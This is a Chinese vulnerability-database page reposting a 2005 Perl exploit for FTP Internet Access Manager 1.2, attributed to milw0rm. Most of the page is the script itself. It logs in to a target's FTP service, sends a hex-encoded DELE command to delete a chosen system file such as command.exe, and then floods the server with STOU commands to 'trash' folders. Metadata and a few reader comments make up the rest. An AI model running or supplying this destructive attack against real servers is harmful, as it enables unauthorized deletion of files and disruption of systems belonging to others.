FTP Internet Access Manager 1.2 – Command Execution
漏洞ID | 1055373 | 漏洞类型 | |
发布时间 | 2005-09-07 | 更新时间 | 2005-09-07 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!usr/bin/perl
#
# FTP Internet Access Manager Command Exploit
# ----------------------------------------------
# Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: www.softfolder.com/internet_access_manager.html
#
use IO::Socket;
if (@ARGV != 4)
{
print "n FTP Internet Access Manager Command Exploitn";
print "---------------------------------------------nn";
print "[!] usage: perl $0 [host] [user] [pass] [*file]n";
print "[?] exam: perl $0 localhost admin 123 C:\WINNT\system32\command.exen";
print "*Only at dir Internet Access Manager was installed that user can deletenany files type(e.g C:\)nn";
exit ();
}
$adr = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$flz = $ARGV[3];
print "n[+] Connect to $adr..n";
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>21, Reuse=>1) or die "Error: can't connect to $adr:21n";
$chr1 = "x55x53x45x52";
$chr2 = "x50x41x53x53";
$dll = "x44x45x4cx45";
$tou = "x70x6fx72x74";
$bel = "x32x31";
$cowflaw = $tou.$bel;
$tmp = "x53x54x4fx55";
$chop = "x4fx56x45x52";
print "[+] Connectedn";
$remote->autoflush(1);
print "[+] FTP Server ..readyn";
print $remote "$chr1 $usern" and print "[+] Send -> USER $user...n" or die
"[-] Error: can't send usern";
sleep(1);
print $remote "$chr2 $passn" and print "[+] Send -> PASS $pass...n" or die
"[-] Error: can't send passn";
sleep(2);
print "[+] User admin logged inn";
print "[+] Press[enter] to DELETE $flzn";
$bla= ;
print $remote "$dll /$flzn";
sleep(2);
print "[+] Successn";
sleep(1);
print "[+] Sending trash mount..n";
sleep(1);
print $remote "$cowflawn";
print $remote "$tmpn";
print "[+] Trashing folder[1]..n";
print $remote "$tmpn";
print "[+] Trashing folder[2]..n";
print $remote "$tmpn";
print "[+] Trashing folder[3]..n";
print $remote "$tmpn";
print "[+] Trashing folder[4]..n";
print $remote "$tmpn";
print "[+] Trashing folder[5]..n";
print $remote "$tmpn";
print "[+] Trashing folder[6]..n";
print $remote "$tmpn";
print "[+] Trashing folder[7]..n";
print $remote "$tmpn";
print "[+] Trashing folder[8]..n";
print $remote "$tmpn";
print "[+] Trashing folder[9]..n";
print $remote "$tmpn";
print "[+] Trashing folder[10]..n";
print $remote "$tmpn";
print "[+] Trashing folder[11]..n";
print $remote "$tmpn";
print "[+] Trashing folder[12]..n";
print $remote "$tmpn";
print "[+] Trashing folder[13]..n";
print $remote "$tmpn";
print "[+] Trashing folder[14]..n";
print $remote "$tmpn";
print "[+] Trashing folder[15]..n";
print $remote "$tmpn";
sleep(2);
print "[+] DONEnn";
print $remote "$chopn";
print "W00t.FTP Flawned!n";
print "..press any key to exitn";
$bla= ;
close $remote;
# milw0rm.com [2005-09-07]
相关推荐: ITHouse Mail Server 1.04 Buffer Overflow Vulnerability
ITHouse Mail Server 1.04 Buffer Overflow Vulnerability 漏洞ID 1104107 漏洞类型 Boundary Condition Error 发布时间 2000-05-30 更新时间 2000-05-30 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666